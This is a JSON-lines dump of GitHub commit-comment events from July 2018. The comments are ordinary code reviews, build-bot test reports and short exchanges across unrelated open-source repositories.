{"id":"8024880508","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849349,"position":42,"line":42,"path":"src/librustc_target/abi/call/riscv.rs","commit_id":"16999338b28c31af34956017831c98ca93d2f507","created_at":"2018-07-26T19:56:56Z","updated_at":"2018-07-26T19:56:56Z","author_association":"NONE","body":"I think this should be\r\n\r\n``` rust\r\n    // \"Scalars wider than 2✕XLEN are passed by reference and are replaced in the argument list with\r\n    // the address.\"\r\n    // \"Aggregates larger than 2✕XLEN bits are passed by reference and are replaced in the argument\r\n    // list with the address, as are C++ aggregates with nontrivial copy constructors, destructors,\r\n    // or vtables.\"\r\n    if arg.layout.size.bits() > 2 * XLEN {\r\n        arg.make_indirect();\r\n    }\r\n\r\n    // \"When passed in registers, scalars narrower than XLEN bits are widened according to the sign\r\n    // of their type up to 32 bits, then sign-extended to XLEN bits.\"\r\n    arg.extend_integer_width_to(XLEN); // this method only affects integer scalars\r\n```"}},"created_at":"2018-07-26T19:56:56Z"}
{"id":"8024883689","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849360,"position":34,"line":34,"path":"src/librustc_target/abi/call/riscv.rs","commit_id":"16999338b28c31af34956017831c98ca93d2f507","created_at":"2018-07-26T19:57:32Z","updated_at":"2018-07-26T19:57:32Z","author_association":"NONE","body":"Comment on `classify_arg_ty` also applies here."}},"created_at":"2018-07-26T19:57:32Z"}
{"id":"8024883702","type":"CommitCommentEvent","actor":{"login":"Duality-CDOO"},"repo":{"name":"duality-solutions/Dynamic"},"payload":{"comment":{"id":29849361,"position":null,"line":null,"path":null,"commit_id":"627ef1443a4545bfbbed8868b50a1ee3cb2400c0","created_at":"2018-07-26T19:57:32Z","updated_at":"2018-07-26T19:57:32Z","author_association":"CONTRIBUTOR","body":"That would of been fun uncaught down the line :P"}},"created_at":"2018-07-26T19:57:32Z"}
{"id":"8024885684","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29849364,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-26T19:57:57Z","updated_at":"2018-07-26T19:57:57Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2915 of 2948 tests passed, 172 test warnings)\n\nMessages:\n\n * 171 tests had: ESO small diffs.\n * 168 tests had: EIO diffs.\n * 108 tests had: Table small diffs.\n * 136 tests had: MTR small diffs.\n * 27 tests had: ESO big diffs.\n * 22 tests had: MTR big diffs.\n * 27 tests had: Table big diffs.\n * 6 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 649\n * Failed: 4\n\nregression Test Summary\n * Passed: 595\n * Failed: 29\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.88%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T19:57:57Z"}
{"id":"8024888140","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29849368,"position":null,"line":null,"path":null,"commit_id":"ffab63090bfbaed33aee6110eb6ca39ecadf78a3","created_at":"2018-07-26T19:58:26Z","updated_at":"2018-07-26T19:58:26Z","author_association":"OWNER","body":"Right, the equivalent of lines 93-95 need to be added to the `Mul` case. As we definitely expect there to be lists of length more than 2.  Well spotted!"}},"created_at":"2018-07-26T19:58:26Z"}
{"id":"8024891655","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29849377,"position":42,"line":42,"path":"otus/app/module/participant/business/participant-messages-service.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:59:10Z","updated_at":"2018-07-26T19:59:10Z","author_association":"MEMBER","body":"Devido a ação do usuário, fica mais claro que ele estaria voltando a etapa de preenchimento e nao cancelando"}},"created_at":"2018-07-26T19:59:10Z"}
{"id":"8024892109","type":"CommitCommentEvent","actor":{"login":"bkalapar"},"repo":{"name":"bkalapar/compression"},"payload":{"comment":{"id":29849379,"position":null,"line":null,"path":null,"commit_id":"866f2a51bd96cc03265823eebac7afa5b51cc124","created_at":"2018-07-26T19:59:15Z","updated_at":"2018-07-26T19:59:15Z","author_association":"OWNER","body":"the .txt file has to be saved and keep on desk for additional changes "}},"created_at":"2018-07-26T19:59:15Z"}
{"id":"8024892756","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29849382,"position":null,"line":null,"path":null,"commit_id":"ca6007fff3751aaa2c7429dca88a114e94b4494e","created_at":"2018-07-26T19:59:23Z","updated_at":"2018-07-26T19:59:23Z","author_association":"NONE","body":"I might be wrong, but I don't like this as a simplification.\r\n\r\nYou are reusing a bonus which happens to be similar at some other place,\r\nbut the bonus meaning is different, and moreover, these bonus are (currently) used in different functions.\r\n\r\nIf at some point we want to change the conditions under which the RookOnPawn apply,\r\nor the conditions under which the ThreatByRook[PAWN] apply, this is not the kind of change that will help.\r\n\r\nHowever, it is good to notice the similarity of the bonus.\r\nMore interesting could be to completely drop the RookOnPawn ode and see if we can simply increase the ThreatByRook[PAWN] instead."}},"created_at":"2018-07-26T19:59:23Z"}
{"id":"8024894133","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29849386,"position":null,"line":null,"path":null,"commit_id":"b101014fcbdd0da90af0404401f15a18baa5a452","created_at":"2018-07-26T19:59:40Z","updated_at":"2018-07-26T19:59:40Z","author_association":"NONE","body":"BUT IT IS SUPPOSED TO BE ALUMINUM YOU MADE IT WRONG\r\n![hahaha i ve had enough](https://user-images.githubusercontent.com/10348657/43285413-29140050-911f-11e8-8d06-3a7c05ab4489.png)\r\n"}},"created_at":"2018-07-26T19:59:40Z"}
{"id":"8024894881","type":"CommitCommentEvent","actor":{"login":"bulldogsrlife9"},"repo":{"name":"landofcoder/magento2-marketplace-social-login"},"payload":{"comment":{"id":29849388,"position":null,"line":null,"path":null,"commit_id":"b23271e9db66bebbb433fffd6256a070c1037c32","created_at":"2018-07-26T19:59:50Z","updated_at":"2018-07-26T19:59:50Z","author_association":"NONE","body":"Hey sorry "}},"created_at":"2018-07-26T19:59:50Z"}
{"id":"8024894911","type":"CommitCommentEvent","actor":{"login":"danaras"},"repo":{"name":"danaras/Oil-Standard"},"payload":{"comment":{"id":29849389,"position":null,"line":null,"path":null,"commit_id":"16735b89ef9775c7cb29971ca2cdadb5a22a1257","created_at":"2018-07-26T19:59:50Z","updated_at":"2018-07-26T19:59:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Oil Standard for Gas / Ceci Moss?](https://trello.com/c/36EO5J5S/378-oil-standard-for-gas-ceci-moss)"}},"created_at":"2018-07-26T19:59:50Z"}
{"id":"8024895275","type":"CommitCommentEvent","actor":{"login":"grumpit"},"repo":{"name":"trevorturk/flash_cookie_session"},"payload":{"comment":{"id":29849392,"position":null,"line":null,"path":null,"commit_id":"28a436916cd165f4cce7fc1171d3af7a131b6010","created_at":"2018-07-26T19:59:55Z","updated_at":"2018-07-26T19:59:55Z","author_association":"NONE","body":"So this change is _great_, but unfortunately it doesn't look like the gem version number was updated or that the build was pushed to rubygems, as the version there lists 1.1.6, Nov 18, 2013 😶\r\n![image](https://user-images.githubusercontent.com/122154/43285421-e1a2fe6a-90ec-11e8-8a5d-9995a4bb4161.png)\r\nAny chance you might be able to do so? Pretty please? 🙂"}},"created_at":"2018-07-26T19:59:55Z"}
{"id":"8019976738","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837899,"position":58,"line":58,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:00:31Z","updated_at":"2018-07-26T02:00:31Z","author_association":"OWNER","body":"Лучше возвращать null, чтобы не перепутать конец функции и пустой результат."}},"created_at":"2018-07-26T02:00:31Z"}
{"id":"8019977519","type":"CommitCommentEvent","actor":{"login":"xzswwp"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29837901,"position":null,"line":null,"path":null,"commit_id":"509552a12f38303b79b95964f82d90f31d15d837","created_at":"2018-07-26T02:00:48Z","updated_at":"2018-07-26T02:00:48Z","author_association":"CONTRIBUTOR","body":"GA 已经可以搜索到并添加，名称显示应该是 GA，但是现在主界面显示 GA，logo 不显示，麻烦检查一下"}},"created_at":"2018-07-26T02:00:48Z"}
{"id":"8019981763","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837909,"position":30,"line":30,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:02:15Z","updated_at":"2018-07-26T02:02:15Z","author_association":"OWNER","body":"Логгер лучше в конструктор запихать. Логи лишними не бывают."}},"created_at":"2018-07-26T02:02:15Z"}
{"id":"8019982180","type":"CommitCommentEvent","actor":{"login":"hyitzhb"},"repo":{"name":"ZhenkunWang/TestProblems-For-MOEAD-MR"},"payload":{"comment":{"id":29837910,"position":null,"line":null,"path":null,"commit_id":"0aafbf617218d12b366811405182b70f3900aae1","created_at":"2018-07-26T02:02:24Z","updated_at":"2018-07-26T02:02:24Z","author_association":"NONE","body":"Thanks a lot!"}},"created_at":"2018-07-26T02:02:24Z"}
{"id":"8019984069","type":"CommitCommentEvent","actor":{"login":"dshkol"},"repo":{"name":"mountainMath/cansim"},"payload":{"comment":{"id":29837914,"position":null,"line":null,"path":null,"commit_id":"940af3ca0e13abc1c3202e18bc1bb8ad47643c98","created_at":"2018-07-26T02:03:05Z","updated_at":"2018-07-26T02:03:05Z","author_association":"COLLABORATOR","body":"Doesn't work.\r\n\r\n```r\r\ndevtools::install_github(\"mountainmath/cansim\", ref = \"get_table_list\")\r\nlibrary(cansim)\r\n# Not exported, not documented\r\ncansim:::get_cansim_table_list()\r\n```\r\n\r\n> Error in cbind_all(x) : Argument 2 must be length 1000, not 986"}},"created_at":"2018-07-26T02:03:05Z"}
{"id":"8019984620","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29837915,"position":12,"line":24,"path":"server.js","commit_id":"970553aa5f0577c746ba5eadd0dc02ccbfe73d72","created_at":"2018-07-26T02:03:16Z","updated_at":"2018-07-26T02:03:16Z","author_association":"OWNER","body":"context will be added a property `store` by the factory function in `src/entry-server.js`. "}},"created_at":"2018-07-26T02:03:16Z"}
{"id":"8019986100","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29837917,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T02:03:49Z","updated_at":"2018-07-26T02:03:49Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T02:03:49Z"}
{"id":"8019987137","type":"CommitCommentEvent","actor":{"login":"mr5gong"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29837922,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T02:04:11Z","updated_at":"2018-07-26T02:04:11Z","author_association":"NONE","body":"good project"}},"created_at":"2018-07-26T02:04:11Z"}
{"id":"8019989899","type":"CommitCommentEvent","actor":{"login":"silbinarywolf"},"repo":{"name":"heyday/silverstripe-elastica"},"payload":{"comment":{"id":29837928,"position":14,"line":457,"path":"src/Searchable.php","commit_id":"464b1ca5d01a88a2fd05d01bc69fb29fac990ca8","created_at":"2018-07-26T02:05:17Z","updated_at":"2018-07-26T02:05:17Z","author_association":"NONE","body":"Is there any reason `use` and ::class weren't used here?\r\nThis allows for better static analysis of code and has the readability benefit of telling you that this file relies on that class (since you can see the \"use\" statement at the top of the file)\r\n\r\n```\r\nuse Symbiote\\QueuedJobs\\Services\\QueuedJobService;\r\n\r\nsingleton(QueuedJobService::class)->queueJob($reindex);\r\n```"}},"created_at":"2018-07-26T02:05:17Z"}
{"id":"8019992075","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29837931,"position":14,"line":26,"path":"server.js","commit_id":"970553aa5f0577c746ba5eadd0dc02ccbfe73d72","created_at":"2018-07-26T02:06:06Z","updated_at":"2018-07-26T02:06:06Z","author_association":"OWNER","body":"`renderToString` inject the store to the output html."}},"created_at":"2018-07-26T02:06:06Z"}
{"id":"8019994903","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29837933,"position":23,"line":22,"path":"src/app.js","commit_id":"970553aa5f0577c746ba5eadd0dc02ccbfe73d72","created_at":"2018-07-26T02:07:08Z","updated_at":"2018-07-26T02:07:08Z","author_association":"OWNER","body":"store is also from a factory/function."}},"created_at":"2018-07-26T02:07:08Z"}
{"id":"8019995310","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29837934,"position":null,"line":null,"path":null,"commit_id":"6bf60d53796ffe5a1e3ea3ee1bb5cac65495ff6a","created_at":"2018-07-26T02:07:17Z","updated_at":"2018-07-26T02:07:17Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.251`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/251) :tada:"}},"created_at":"2018-07-26T02:07:17Z"}
{"id":"8019995947","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29837935,"position":null,"line":null,"path":null,"commit_id":"50540416f4a81184e9858c15a6f763d727e4feb6","created_at":"2018-07-26T02:07:32Z","updated_at":"2018-07-26T02:07:32Z","author_association":"NONE","body":"$!despacito"}},"created_at":"2018-07-26T02:07:32Z"}
{"id":"8019996108","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837936,"position":63,"line":63,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:07:36Z","updated_at":"2018-07-26T02:07:36Z","author_association":"OWNER","body":"Было бы здорово добавить хэширование."}},"created_at":"2018-07-26T02:07:36Z"}
{"id":"8019999943","type":"CommitCommentEvent","actor":{"login":"wonheejeong"},"repo":{"name":"wonheejeong/SecuGo"},"payload":{"comment":{"id":29837943,"position":null,"line":null,"path":null,"commit_id":"2bbd3ab3f49e2132a2fb37efd7a2bb03f9b84973","created_at":"2018-07-26T02:09:03Z","updated_at":"2018-07-26T02:09:03Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-26T02:09:03Z"}
{"id":"8020000386","type":"CommitCommentEvent","actor":{"login":"MCamp859"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29837945,"position":4,"line":52,"path":"source/clear-linux/tutorials/kata_migration.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-26T02:09:12Z","updated_at":"2018-07-26T02:09:12Z","author_association":"OWNER","body":"I'd like to get input from the folks who wrote the tutorials about combining them, please see [PR 203](https://github.com/clearlinux/clear-linux-documentation/pull/203). "}},"created_at":"2018-07-26T02:09:12Z"}
{"id":"8020002565","type":"CommitCommentEvent","actor":{"login":"jasmainak"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":29837947,"position":33,"line":1760,"path":"mne/viz/_3d.py","commit_id":"c4fca6beebdfd1fda722755eeb40b8c16b3ec0f0","created_at":"2018-07-26T02:10:04Z","updated_at":"2018-07-26T02:10:04Z","author_association":"MEMBER","body":"interesting, I see!"}},"created_at":"2018-07-26T02:10:04Z"}
{"id":"8020003703","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29837950,"position":9,"line":9,"path":"src/entry-client.js","commit_id":"970553aa5f0577c746ba5eadd0dc02ccbfe73d72","created_at":"2018-07-26T02:10:28Z","updated_at":"2018-07-26T02:10:28Z","author_association":"OWNER","body":"As I have mentioned, `renderToString` serialize the store and inject it to the output html. The client side code read the serialized store and init the font-end store. so that client side do not need the fetch the data again, and also guarantee the hydration work."}},"created_at":"2018-07-26T02:10:28Z"}
{"id":"8020005510","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29837951,"position":null,"line":null,"path":null,"commit_id":"6bf60d53796ffe5a1e3ea3ee1bb5cac65495ff6a","created_at":"2018-07-26T02:11:04Z","updated_at":"2018-07-26T02:11:04Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.380`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/408321886) :tada:"}},"created_at":"2018-07-26T02:11:04Z"}
{"id":"8020007212","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29837956,"position":26,"line":26,"path":"src/entry-server.js","commit_id":"970553aa5f0577c746ba5eadd0dc02ccbfe73d72","created_at":"2018-07-26T02:11:43Z","updated_at":"2018-07-26T02:11:43Z","author_association":"OWNER","body":"before resolve the app and render it, prefetch the data here."}},"created_at":"2018-07-26T02:11:43Z"}
{"id":"8020011524","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29837963,"position":33,"line":33,"path":"src/entry-server.js","commit_id":"970553aa5f0577c746ba5eadd0dc02ccbfe73d72","created_at":"2018-07-26T02:13:16Z","updated_at":"2018-07-26T02:13:16Z","author_association":"OWNER","body":"assign the state to context, so that the state will be serialized and inject to the output html."}},"created_at":"2018-07-26T02:13:16Z"}
{"id":"8020012033","type":"CommitCommentEvent","actor":{"login":"teto"},"repo":{"name":"sourabhjains/ns-3-dce"},"payload":{"comment":{"id":29837964,"position":9,"line":1574,"path":"model/dce-manager.cc","commit_id":"8738a3bf27fa13ffdb1f9b4219b16689bc246f2e","created_at":"2018-07-26T02:13:27Z","updated_at":"2018-07-26T02:13:27Z","author_association":"NONE","body":" * @panic - called during a kernel panic\r\nNS_ASSERT is not compiled in release mode. Call `dce_exit (int status)` as is done in dce_abort."}},"created_at":"2018-07-26T02:13:27Z"}
{"id":"8020017809","type":"CommitCommentEvent","actor":{"login":"qubbit"},"repo":{"name":"qubbit/arbiter"},"payload":{"comment":{"id":29837976,"position":null,"line":null,"path":null,"commit_id":"7024b79db59438db3c8990b2aaa69b13f7bb8668","created_at":"2018-07-26T02:15:38Z","updated_at":"2018-07-26T02:15:38Z","author_association":"OWNER","body":"@mikegee The goal is to not perform lazy evaluation right now. There is a front-end that accepts rules and test data. The user needs to be able to see whether the supplied data matched with the condition in their rule. We want to produce true/false based on that and feed back to the front-end."}},"created_at":"2018-07-26T02:15:38Z"}
{"id":"8020022921","type":"CommitCommentEvent","actor":{"login":"mattbuzz94"},"repo":{"name":"mattbuzz94/zerograu"},"payload":{"comment":{"id":29837978,"position":null,"line":null,"path":null,"commit_id":"b51fe3c97bc76381bfd0c4e114fc15812acf2e07","created_at":"2018-07-26T02:17:23Z","updated_at":"2018-07-26T02:17:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [2b - Implementar Produto Service API (Backend)](https://trello.com/c/vBASGYl5/12-2b-implementar-produto-service-api-backend)"}},"created_at":"2018-07-26T02:17:23Z"}
{"id":"8020023203","type":"CommitCommentEvent","actor":{"login":"developius"},"repo":{"name":"dataknut/nzGREENGridDataR"},"payload":{"comment":{"id":29837979,"position":null,"line":null,"path":null,"commit_id":"2baabc101a23490aa2c3078525340a8ce00ab1c5","created_at":"2018-07-26T02:17:30Z","updated_at":"2018-07-26T02:17:30Z","author_association":"NONE","body":"Well clearly the month is in the middle, since neither 16 or 17 are valid months. But yeah, which is which for the days. Nice."}},"created_at":"2018-07-26T02:17:30Z"}
{"id":"8020023306","type":"CommitCommentEvent","actor":{"login":"arthurkiller"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29837980,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:17:32Z","updated_at":"2018-07-26T02:17:32Z","author_association":"COLLABORATOR","body":"@ayanamist this branch has already diverged with master and did not passed the test yet. May be this will not be merged."}},"created_at":"2018-07-26T02:17:32Z"}
{"id":"8020025046","type":"CommitCommentEvent","actor":{"login":"neikeq"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29837986,"position":null,"line":null,"path":null,"commit_id":"8edf85b09c014bee48adcc515a46cf315ef393f5","created_at":"2018-07-26T02:18:11Z","updated_at":"2018-07-26T02:18:11Z","author_association":"MEMBER","body":"> Damn, this introduced a regression. Trying to fix it...\r\n\r\nFalse alarm."}},"created_at":"2018-07-26T02:18:11Z"}
{"id":"8020025513","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837988,"position":11,"line":11,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:18:21Z","updated_at":"2018-07-26T02:18:21Z","author_association":"OWNER","body":"Это не декоратор. Название класса не отражает сути. "}},"created_at":"2018-07-26T02:18:21Z"}
{"id":"8020025817","type":"CommitCommentEvent","actor":{"login":"ayanamist"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29837990,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:18:28Z","updated_at":"2018-07-26T02:18:28Z","author_association":"CONTRIBUTOR","body":"Cherry pick this single commit?"}},"created_at":"2018-07-26T02:18:28Z"}
{"id":"8020027624","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837993,"position":55,"line":55,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:19:10Z","updated_at":"2018-07-26T02:19:10Z","author_association":"OWNER","body":"Неизвестная ошибка. Ошибку нужно вывести в лог.\r\n$this->logger->critical('An error occurred: ' . $e->getMessage()); throw $e;"}},"created_at":"2018-07-26T02:19:10Z"}
{"id":"8020031655","type":"CommitCommentEvent","actor":{"login":"WeAthFoLD"},"repo":{"name":"LambdaInnovation/AcademyCraft"},"payload":{"comment":{"id":29837997,"position":19,"line":19,"path":"src/main/java/cn/academy/terminal/registry/RegApp.java","commit_id":"0c564ee7e7ba5396b1803693dbed29c9eeba5872","created_at":"2018-07-26T02:20:40Z","updated_at":"2018-07-26T02:20:40Z","author_association":"CONTRIBUTOR","body":"1. No StateEventCallback\r\n2. e.pST() should be `throw new RuntimeException(e);`"}},"created_at":"2018-07-26T02:20:40Z"}
{"id":"8020031968","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29837998,"position":null,"line":null,"path":null,"commit_id":"a9fa00935dde0ffa960d617559d61087115e0e16","created_at":"2018-07-26T02:20:47Z","updated_at":"2018-07-26T02:20:47Z","author_association":"CONTRIBUTOR","body":"I was actually thinking about hiding them in `uBO-filter`s, because that is some riciculous over the top self promotion in my opinion. 😉 "}},"created_at":"2018-07-26T02:20:47Z"}
{"id":"8020032393","type":"CommitCommentEvent","actor":{"login":"cq2ap9"},"repo":{"name":"cq2ap9/DriveSimulator"},"payload":{"comment":{"id":29837999,"position":null,"line":null,"path":null,"commit_id":"623d3be83f4ad8adb55f2682a2d84ef0e15102c2","created_at":"2018-07-26T02:20:56Z","updated_at":"2018-07-26T02:20:56Z","author_association":"OWNER","body":"清除无用行"}},"created_at":"2018-07-26T02:20:56Z"}
{"id":"8020034071","type":"CommitCommentEvent","actor":{"login":"knight182"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29838002,"position":null,"line":null,"path":null,"commit_id":"fd9c3d1a790543dd7d669e39adaf4cbdfffaf0bd","created_at":"2018-07-26T02:21:34Z","updated_at":"2018-07-26T02:21:34Z","author_association":"CONTRIBUTOR","body":"Ohk\n\nOn Thu, Jul 26, 2018, 1:27 AM Lup Gabriel <notifications@github.com> wrote:\n\n> @knight182 <https://github.com/knight182> please don't commit lots of\n> small file modifications in lots of commits\n> always follow the HowTo\n> https://github.com/crdroidandroid/android_vendor_crDroidOTA/blob/8.1/README.md#how-to\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/crdroidandroid/android_vendor_crDroidOTA/commit/fd9c3d1a790543dd7d669e39adaf4cbdfffaf0bd#commitcomment-29834685>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am6XQtZgeGF-hyDXFM6CbPDFhBcwc-Gbks5uKM2egaJpZM4VgtDq>\n> .\n>\n"}},"created_at":"2018-07-26T02:21:34Z"}
{"id":"8020057760","type":"CommitCommentEvent","actor":{"login":"reichley"},"repo":{"name":"Dafang-Hacks/spiflasher"},"payload":{"comment":{"id":29838032,"position":null,"line":null,"path":null,"commit_id":"f83942722415dd87027365726a62a74d06d7602f","created_at":"2018-07-26T02:30:27Z","updated_at":"2018-07-26T02:30:27Z","author_association":"NONE","body":"So I flashed the wyzecam v2 with the 128.bin according to the instructions, receive a blue light on boot, but can't find the device on my network. I guess I need to hook it up to serial and check? Tried with and without uEnv.txt using EXT3 and rootfs git clone. Do I need to do the `dd if=/dev/zero of=fullflash.bin bs=1 count=1 seek=16777215` to the binary like indicated in the instructions in this repo?"}},"created_at":"2018-07-26T02:30:27Z"}
{"id":"8020058161","type":"CommitCommentEvent","actor":{"login":"arthurkiller"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838033,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:30:34Z","updated_at":"2018-07-26T02:30:34Z","author_association":"COLLABORATOR","body":"Why you are hurry with this dependency change."}},"created_at":"2018-07-26T02:30:34Z"}
{"id":"8020061788","type":"CommitCommentEvent","actor":{"login":"konimex"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29838042,"position":null,"line":null,"path":null,"commit_id":"d2eaf861e67652397fa18fce8e86076743433992","created_at":"2018-07-26T02:31:57Z","updated_at":"2018-07-26T02:31:57Z","author_association":"MEMBER","body":"Looks good to me. But I don't think it needs to conflict with gitea-openrc (unless there *is* a file collision between the two)"}},"created_at":"2018-07-26T02:31:57Z"}
{"id":"8020062954","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29838043,"position":55,"line":55,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:32:22Z","updated_at":"2018-07-26T02:32:22Z","author_association":"OWNER","body":"Неизвестная ошибка. Ошибку нужно вывести в лог.\r\n$this->logger->critical('An error occurred: ' . $e->getMessage());"}},"created_at":"2018-07-26T02:32:22Z"}
{"id":"8020065945","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29838045,"position":52,"line":52,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:33:30Z","updated_at":"2018-07-26T02:33:30Z","author_association":"OWNER","body":"Кеш не сохраняется. Добавить `$this->cache->save($cacheItem)`"}},"created_at":"2018-07-26T02:33:30Z"}
{"id":"8020066157","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838046,"position":21,"line":21,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T02:33:35Z","updated_at":"2018-07-26T02:33:35Z","author_association":"NONE","body":"In python, you mean __str__. "}},"created_at":"2018-07-26T02:33:35Z"}
